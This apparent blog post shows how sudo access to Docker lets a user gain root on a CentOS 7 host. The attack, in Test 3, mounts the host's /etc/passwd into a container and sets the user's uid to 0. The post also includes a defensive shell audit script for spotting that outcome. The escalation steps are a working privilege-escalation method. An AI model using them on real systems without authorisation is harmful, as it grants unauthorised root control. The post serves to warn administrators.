Using Docker to get root access

In my previous post I mentioned that I am learning about Podman, a tool for running containers that does not require a daemon process (like the Docker daemon) or root privileges.

In this post I would like to demonstrate why running containers with root privileges could be dangerous.

Setup

For my demonstration, I have a CentOS 7 host running on VirtualBox. I have installed Docker and started the Docker daemon via the following steps:

sudo yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo
sudo yum install docker-ce
sudo systemctl start docker

Next, I will create a new user, Bob Billiards:

sudo useradd -u 8888 -c "Bob Billiards" bbilliar

I will let Bob run the docker command via sudo:

sudo visudo -f /etc/sudoers.d/docker
bbilliar     ALL=/usr/bin/docker

Test 1 – Confirm user is able to run Docker via sudo

[bbilliar@centos7 ~]$ sudo docker run --rm -it alpine sh
/ #

Bob is able to run Docker via sudo, as expected.

Test 2 – Publish a privileged port

This time, Bob is going to publish port 80, a privileged port. This may be unexpected for an unprivileged user, but it works because Docker runs with root privileges:

[bbilliar@centos7 ~]$ sudo docker run --rm -it -p 80:80 alpine sh
/ #

To test that it is really bound to port 80, I started netcat listening on port 80 in the container:

/ # nc -l -p 80

Then I ran curl from the host:

[bbilliar@centos7 ~]$ curl localhost

The request headers appeared in the container, as expected:

GET / HTTP/1.1
User-Agent: curl/7.29.0
Host: localhost
Accept: */*

Test 3 – Share a volume and gain root access

This time, Bob is going to share a volume between the host and the container. Specifically, he is going to mount the host’s /etc/passwd file as /etc/passwd inside the container:

[bbilliar@centos7 ~]$ sudo docker run --rm -it --volume /etc/passwd:/etc/passwd alpine sh
/ # 

From here, edit /etc/passwd and change user bbilliar’s uid and gid to 0. Because the file is mounted from the host, the edit is written to the host’s /etc/passwd.

Exit the container.

View user bbilliar’s /etc/passwd entry on the host:

[bbilliar@centos7 ~]$ grep bbilliar /etc/passwd
bbilliar:x:0:0::/home/bbilliar:/bin/bash

Log out, and log back in as bbilliar:

Using username "bbilliar".
bbillar@127.0.0.1's password:
Last login: Mon Dec 31 13:38:57 2018 from 10.0.2.2
[root@centos7 ~]#

Bob is now root! This may not be what the administrator expected when giving Bob sudo privileges to run Docker.
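
For an administrator who wants to check for the state Test 3 leaves behind, here is an added example that is not part of the original setup: two audit functions, one listing non-root accounts with uid or gid 0 and one listing who a sudoers file allows to run /usr/bin/docker. The function names and the sample data are constructed for illustration, and the sudoers check is line-based, so it does not resolve aliases or includes.

```shell
#!/bin/sh
# Added example: audit checks for the result of Test 3 and for the sudo rule
# that made it possible. Function names and sample data are constructed.

# Print non-root accounts whose uid or gid is 0 in a passwd-format file.
# The pattern also matches zero-padded values such as 00.
uid0_accounts() {
    awk -F: '$1 != "root" && ($3 ~ /^0+$/ || $4 ~ /^0+$/) { print $1 }' "$1"
}

# Print the first field (user, %group or alias keyword) of every
# non-comment line in a sudoers-format file that names /usr/bin/docker.
docker_sudoers() {
    awk 'NF && $1 !~ /^#/ {
        n = split($0, parts, /[ \t,=]+/)
        for (i = 2; i <= n; i++)
            if (parts[i] == "/usr/bin/docker") { print $1; next }
    }' "$1"
}

# Constructed sample files mirroring the host after Test 3.
demo() {
    dir=$(mktemp -d) || return 1
    printf '%s\n' \
        'root:x:0:0:root:/root:/bin/bash' \
        'alice:x:1000:1000::/home/alice:/bin/bash' \
        'bbilliar:x:0:0::/home/bbilliar:/bin/bash' > "$dir/passwd"
    printf '%s\n' \
        '# constructed sudoers drop-in' \
        'bbilliar     ALL=/usr/bin/docker' \
        'alice        ALL=/usr/bin/systemctl status docker' > "$dir/sudoers"
    echo "uid/gid 0 accounts other than root: $(uid0_accounts "$dir/passwd")"
    echo "Allowed to run docker via sudo:     $(docker_sudoers "$dir/sudoers")"
    rm -rf "$dir"
}
demo
```

On a real host, point uid0_accounts at /etc/passwd and run docker_sudoers (as root) over /etc/sudoers and each file in /etc/sudoers.d.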
